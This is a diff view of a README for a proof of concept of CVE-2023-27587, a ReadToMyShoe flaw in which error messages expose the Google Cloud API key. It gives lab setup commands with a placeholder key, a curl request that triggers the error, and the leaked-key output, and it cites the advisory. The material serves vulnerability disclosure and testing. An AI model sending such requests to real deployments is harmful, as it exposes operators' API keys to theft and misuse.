🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    README.md
    1 1  # CVE-2023-27587-PoC
    2 2  The simple PoC of CVE-2023-27587
    3 3   
     4 +## What is ReadToMyShoe?
     5 +ReadtoMyShoe (RTMS) is a web application (rust, yew and axum) that lets you upload articles (via URL or via directly pasting) and listen to them later.
     6 + 
     7 +## Impact
     8 + 
     9 +If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, then it will include the full URL of the request. The request URL contains the Google Cloud API key.
     10 + 
     11 +# PoC
     12 +#### Setup ReadtoMyShoe vulnerable
     13 +```
     14 +$ git clone https://github.com/rozbb/readtomyshoe.git
     15 +$ cd readtomyshoe && git checkout v0.2.0
     16 +$ echo "GCP_KEY_LEAKED_TEST" > server/gcp_api.key
     17 +$ DOCKER_BUILDKIT=1 docker build -t readtomyshoe-vul .
     18 +$ docker run -p 9382:9382 readtomyshoe-vul
     19 +```
     20 + 
     21 +#### Exploit
     22 +*The key is only exposed when an error occurs in the GCP call!*
     23 + 
     24 +```
     25 +curl 'http://192.168.15.201:9382/api/add-article-by-text' -X POST \
     26 + -H 'Accept-Encoding: gzip, deflate' \
     27 + -H 'content-type: application/json' \
     28 + --data-raw '{"title":"Kernsicherheitstest","body":"Kernsicherheitstest"}'
     29 +```
     30 + 
     31 +#### Response error (exposed api key):
     32 +```
     33 +TTS failed: TTS request failed
     34 + 
     35 +Caused by:
     36 + HTTP status client error (400 Bad Request) for url (https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=GCP_KEY_LEAKED_TEST%0A)
     37 +```
     38 +![Screenshot from 2023-03-15 13-03-59](https://user-images.githubusercontent.com/4332906/225371897-4984d95d-1c4a-458d-862b-447db391ff5a.png)
     39 + 
     40 + 
     41 +### References
     42 +https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g
     43 + 
     44 +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587
     45 + 
Please wait...
Page is in error, reload to recover